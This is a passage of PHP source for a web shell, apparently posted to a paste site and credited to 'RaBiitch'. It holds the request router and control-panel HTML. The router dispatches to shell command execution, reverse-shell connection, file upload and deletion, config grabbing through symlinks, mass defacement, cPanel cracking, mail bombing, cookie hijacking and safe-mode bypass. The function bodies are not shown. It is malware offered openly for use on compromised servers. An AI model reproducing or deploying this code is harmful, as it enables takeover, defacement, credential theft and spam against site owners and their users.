  3231. } else if(isset($_REQUEST['adminer'])) {
  3232.     adminer();
  3233. } else if(isset($_REQUEST['sh311_scanner'])) {
  3234.     shell_finder_ui();
  3235. } else if(isset($_REQUEST['ftp_host']) &&
  3236. isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass'])) {
  3237.     ftp_man_bg();
  3238. } else if(isset($_REQUEST['ftpman'])) {
  3239.     ftp_man_ui();
  3240. } else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user'])
  3241. && isset($_GET['ssh_pass'])) {
  3242.     ssh_man_bg();
  3243. } else if(isset($_REQUEST['sshman'])) {
  3244.     ssh_man_ui();
  3245. } else if(isset($_REQUEST['c0de_inject']) &&
  3246. isset($_REQUEST['path'])) {
  3247.     chdir($_GET['path']);
  3248.     code_in_ui();
  3249. } else if(isset($_GET['sh311_scanx'])) {
  3250.     shell_finder_bg();
  3251. } else if(isset($_REQUEST['config_grab'])) {
  3252.     sym_xxx();
  3253. } else if(isset($_REQUEST['ftp_man'])) {
  3254.     ftp_man_ui();
  3255. } else if(isset($_REQUEST['mass_xploit'])) {
  3256.     mass_deface_ui();
  3257. } else if(isset($_GET['f_host']) && isset($_GET['f_user'])
  3258. && isset($_GET['f_pass'])) {
  3259.     ftp_man_bg();
  3260. } else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
  3261. {
  3262.     mass_deface_bg();
  3263. } else if(isset($_REQUEST['ftp_anon_scan'])) {
  3264.     ftp_anonymous_ui();
  3265. } else if(isset($_GET['ftp_anonz'])) {
  3266.     ftp_anonymous_bg();
  3267. } else if(isset($_REQUEST['killme'])) {
  3268.     killme();
  3269. } else if(isset($_REQUEST['hexenc'])) {
  3270.     hex_encode_ui();
  3271. } else if(isset($_REQUEST['remotefiledown'])) {
  3272.     remote_download_ui();
  3273. } else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile'])
  3274. && isset($_GET['path'])) {
  3275.     remote_download_bg();
  3276. } else if(isset($_REQUEST['cpanel_crack'])) {
  3277.     cpanel_crack();
  3278. } else if(isset($_REQUEST['rem_web']) &&
  3279. isset($_REQUEST['tryzzz'])) {
  3280.     remote_file_check_bg();
  3281. } else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc'])
  3282. && isset($_REQUEST['php_content'])) {
  3283.     php_ende_bg();
  3284. } else if(isset($_REQUEST['remote_server_scan'])) {
  3285.     remote_file_check_ui();
  3286. } else if(isset($_REQUEST['server_exploit_details'])) {
  3287.     exploit_details();
  3288. } else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail'])
  3289. && isset($_REQUEST['subject_mail']) &&
  3290. isset($_REQUEST['mail_content'])) {
  3291.     massmailer_bg();
  3292. } else if(isset($_REQUEST['mysqlman'])) {
  3293.     mysqlman();
  3294. } else if(isset($_REQUEST['bomb_to']) &&
  3295. isset($_REQUEST['bomb_subject']) &&
  3296. isset($_REQUEST['bmail_content'])) {
  3297.     mailbomb_bg();
  3298. } else if(isset($_REQUEST['cookiejack'])) {
  3299.     cookie_jack();
  3300. } else if(isset($_REQUEST['massmailer'])) {
  3301.     massmailer_ui();
  3302. } else if(isset($_REQUEST['rename'])) {
  3303.     chdir($_GET['path']);
  3304.     rename_ui();
  3305. } else if(isset($_GET['old_name']) && isset($_GET['new_name'])) {
  3306.     chdir($_GET['path']);
  3307.     rename_bg();
  3308. } else if(isset($_REQUEST['encodefile'])) {
  3309.     php_ende_ui();
  3310. } else if(isset($_REQUEST['edit'])) {
  3311.     edit_file();
  3312. } else if(isset($_REQUEST['down']) && isset($_REQUEST['path'])) {
  3313.     download();
  3314. } else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path'])) {
  3315.     download_gzip();
  3316. } else if(isset($_REQUEST['read'])) {
  3317.     chdir($_GET['path']);
  3318.     code_viewer();
  3319. } else if(isset($_REQUEST['perm'])) {
  3320.     chdir($_GET['path']);
  3321.     ch_perm_ui();
  3322. } else if(isset($_GET['path']) && isset($_GET['p_filex'])
  3323. && isset($_GET['new_perm'])) {
  3324.     chdir($_GET['path']);
  3325.     ch_perm_bg();
  3326. } else if(isset($_REQUEST['del_fil'])) {
  3327.     chdir($_GET['path']);
  3328.     delete_file();
  3329.     exit;
  3330. } else if(isset($_REQUEST['phpinfo'])) {
  3331.     chdir($_GET['path']);
  3332.     ob_clean();
  3333.     echo phpinfo();
  3334.     exit;
  3335. } else if(isset($_REQUEST['del_dir'])) {
  3336.     chdir($_GET['path']);
  3337.     $d_dir = $_GET['del_dir'];
  3338.     deldirs($d_dir);
  3339. } else if(isset($_GET['path']) && isset($_GET['new_file'])) {
  3340.     chdir($_GET['path']);
  3341.     mk_file_ui();
  3342. } else if(isset($_GET['path']) && isset($_GET['new_f_name'])
  3343. && isset($_GET['n_file_content'])) {
  3344.     mk_file_bg();
  3345. } else if(isset($_GET['path']) && isset($_GET['new_dir'])) {
  3346.     chdir($_GET['path']);
  3347.     create_dir();
  3348. } else if(isset($_GET['path']) && isset($_GET['cmdexe'])) {
  3349.     chdir($_GET['path']);
  3350.     cmd();
  3351. } else if(isset($_POST['upload_f']) && isset($_POST['path'])) {
  3352.     upload_file();
  3353. } else if(isset($_REQUEST['rs'])) {
  3354.     reverse_conn_ui();
  3355. } else if(isset($_GET['rev_option']) && isset($_GET['my_ip'])
  3356. && isset($_GET['my_port'])) {
  3357.     reverse_conn_bg();
  3358. } else if(isset($_REQUEST['safe_mod']) &&
  3359. isset($_REQUEST['path']))
  3360. {
  3361.     chdir($_GET['path']);
  3362.     safe_mode_fuck_ui();
  3363. } else if(isset($_GET['path']) && isset($_GET['safe_mode'])) {
  3364.     safe_mode_fuck();
  3365. } else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) {
  3366.     AccessDenied();
  3367. } else if(isset($_REQUEST['symlink'])) {
  3368.     sym_link();
  3369. } else if(isset($_GET['path']) && isset($_GET['copy'])) {
  3370.     copy_file_ui();
  3371. } else if(isset($_GET['c_file']) && isset($_GET['c_target'])
  3372. && isset($_GET['cn_name'])) {
  3373.     copy_file_bg();
  3374. } else {
  3375.     filemanager_bg();
  3376. }
  3377. echo "</div>
  3378. <div id=result>
  3379. <center><p>
  3380. <table class='tbl'><tr><td>
  3381. <form method='GET'>PWD :
  3382. <input size='50' name='path' value='" . getcwd() . "'>
  3383. <input type='submit'
  3384. value='submit'></form></td></tr></table>
  3385. <table class='tbl'><tr>
  3386. <td><form style='float:right;' method='GET'>
  3387. <input name='path' value='" . getcwd() . "'
  3388. type=hidden><span> New File : </span>
  3389.           <input type='submit' value='submit'>
  3390.           <input size='40' name='new_file'></form>
  3391.          </td>
  3392.          <td><form  style='float:left;' method='GET'>
  3393.           <input name='path' value='" . getcwd() . "'
  3394. type=hidden>
  3395.           <input size='40' name='new_dir'>
  3396.           <input type='submit' value='submit'>
  3397.           <span> : New Dir</span></form>
  3398.          </td>
  3399.      </tr>
  3400.      <tr>
  3401.          <td><form style='float:right;' method='GET'>
  3402.           <input style='float:left;' name='path' value='" . getcwd() .
  3403. "' type=hidden>
  3404.           <span>CMD : </span>
  3405.           <input type='submit' value='submit'>
  3406.           <input name='cmdexe' size='40'></form>
  3407.          </td>
  3408.          <td><form style='float:left;' method='POST'
  3409. enctype=\"multipart/form-data\">
  3410.           <input name='path' value='" . getcwd() . "'
  3411. type=hidden>
  3412.           <input size='27' name='upload_f' type='file'>
  3413.           <input type='submit' name='upload_f' value='submit'>
  3414.           <span> : Upload File</span></form>
  3415.          </td>
  3416.        </tr>
  3417.      </table></p>
  3418. <font size=4 color=yellow>
  3419. <a style='color:yellow;text-decoration:none;'
  3420. <a href='https://www.rabiitch.ga/' target='_blank'><font
  3421. color=lime> Copyright &copy; ".date("Y")." -
  3422. RaBiitch </a></center>Date
  3423. : $date</font></div>";
Add Comment
Please, Sign In to add comment